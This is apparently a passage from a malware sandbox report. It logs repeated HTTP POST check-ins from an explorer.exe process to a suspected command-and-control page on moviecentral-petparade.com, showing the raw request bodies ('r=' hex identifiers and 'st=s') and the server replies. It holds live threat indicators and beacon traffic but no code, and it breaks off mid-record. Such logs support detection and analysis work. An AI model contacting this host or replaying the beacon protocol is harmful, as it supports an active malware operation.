                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      17192.168.2.949999172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.256545067 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:26:17.157974958 CET788INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:17 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mm0HE%2B8i%2B7QT%2Bk8G%2FB90yD7azhjA6wAN4P39QyZB8ojBJOyb6TIynMEdZ5eOS%2F8Sx2TrvoUb38ivjrpkhsmLWR15OI0ldQ538SoaceHDkH8KuPHwhTm4hVY8hXorJuFSSdk3PXJ1hZLanvErxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f9d30f48e803-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1326&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      18192.168.2.950000172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:18.852936983 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:26:19.728466988 CET776INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:19 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q3bHP53iopgTKv48CT%2B%2BJhqQmlIvQIna5mGE9YELWi7g6tIAvzGQL95G140gnayVoFRJloYRElH7RKvTgUYMBS0VraAbfs0aQzBKqZsN3DFwB6v3eOLf6a1DNU8DgU6NBtqe4uL1f5dhvL9GFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f9e33e4d28e0-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1609&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      19192.168.2.950001172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:21.238836050 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.152596951 CET781INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:22 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8olPpCqXr0jNcXUS9RYZuirqX5SvdxgyGIF3ZwiQpNY%2BaCFpOtV5kCv2J5hvd7TfF%2BbLxNU2JGYsEdC5QzTYWLxrJusJY6Mnjfb9wtZZyGCF1%2B4aw9%2BgEQI6fidOlIsBwbNhIBugB2tnjmPuiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f9f21d9c47a5-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>
                                                                                                                                                                                                                      Oct 31, 2024 14:26:22.152916908 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      20192.168.2.950002172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:23.786540031 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:26:24.677872896 CET786INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:24 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ZlV%2Bl3tvYUq5Smh6Tp%2FA%2BUeSMrFIcgEeWtR%2FUIyLX6pSmhEoskvJQZaiTX0vFPUUusnO43JcdkP%2BPGT3LQ15V8TGxnW1LPXpt0%2BuVU71BGXRGsNxIsonB%2FRCY052fANnppBfGXqIRyR74Ry8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fa022c932e7f-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      21192.168.2.950003172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:26.222580910 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:26:27.099616051 CET788INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:27 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pL6OTEIXZrP0tXNXE%2F3k9PjoDHFs3vDVk3kVl3oQlkPIahrjH0ZZylT7nvuRDsyIzeI50TvYeaXooCEbzffTImE%2FzBZXm6d7BMGlvubL%2FzUvvGzSsUy4VBSGSayOlG9%2FR%2BcVnN1MoGOQ5UTnCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fa114ad76b8f-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1922&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      22192.168.2.950004172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:28.769045115 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:26:29.635559082 CET773INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:29 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FegmGAhhG1mbLfDOWipPUd5SO0K1gAeUsMS8w4DwMpgE7OBrNXW0hYDXfn2wR71%2BIQB7USAVZ27owI7%2BT6U4Krx%2Fj33N6wULlOovVJNUc7cqH7lbGBBSIV4NUlu4EQ4xvMUCgsjykaSxkyYyBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fa212fd46ba0-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1082&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:29.635613918 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      23192.168.2.950005172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:31.219444990 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.108320951 CET779INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:32 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=neHCUaEgZAQJWkboBF98OVsOUnJW0FaZWSCfYq0K%2BfhzmtHZETXuLth5duyccfdOpNybtF9QocTMYskuVrDu08r4PZpRFvrQQdEUIJ%2BvZqLg7MRDptmSAuRGtmUf3gTy30A%2FEqh83SruhMOHTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fa308ab7e85f-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1468&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>
                                                                                                                                                                                                                      Oct 31, 2024 14:26:32.108341932 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      24192.168.2.950006172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:33.737716913 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:26:34.627324104 CET775INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:34 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oCLso4pOSNu9rHcGJk1yqj3hTVsHLUlrL8s3cBDawiaCqbdLV%2Byc3ptNuAWPkFcpz%2Fj1C%2FpqRQ4gtFlZJ8LSKhQcFzSsxzlogs54KAUtiFux%2BeAJbUWNwIZHnchYTJi6Cx27AckxNFOp2p5fEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fa4038302cd2-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1069&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:34.627351999 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      25192.168.2.950007172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:36.152740002 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:26:37.057300091 CET777INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:36 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cIDEkx2WXWSe4zWmbP1hGWsWTnOTgzj3RdXWSyMAgvam80ARvXnpF1tWpqo1%2FZWo5u4e968Kw9kxpxVQNTf6SNuFNxRx08vyHxI1cG37JCn3DZ8fMt864i3c3m7dDO%2Bvq1dzT0kmLNOCMs55UQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fa4f6fbb6c33-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1269&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>
                                                                                                                                                                                                                      Oct 31, 2024 14:26:37.057357073 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      26192.168.2.950008172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:38.693758011 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:26:39.610028028 CET784INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:39 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVvJK%2FCbQNSkCtp3woQ9iJxzHty%2Fwx8siZ53cubkU3Q5%2B32T3a9au9jTyu%2BzJUYxDjpy%2BrmTJwirrHZuAj6Leid1R0FSK9ixTjrPY8vz%2Be1tujf72XQcHBsTQCdDFiEq4nHx1bYt9j9F2nxiRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fa5f68534763-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1696&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      27192.168.2.950009172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:41.130727053 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:26:42.002751112 CET786INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:41 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
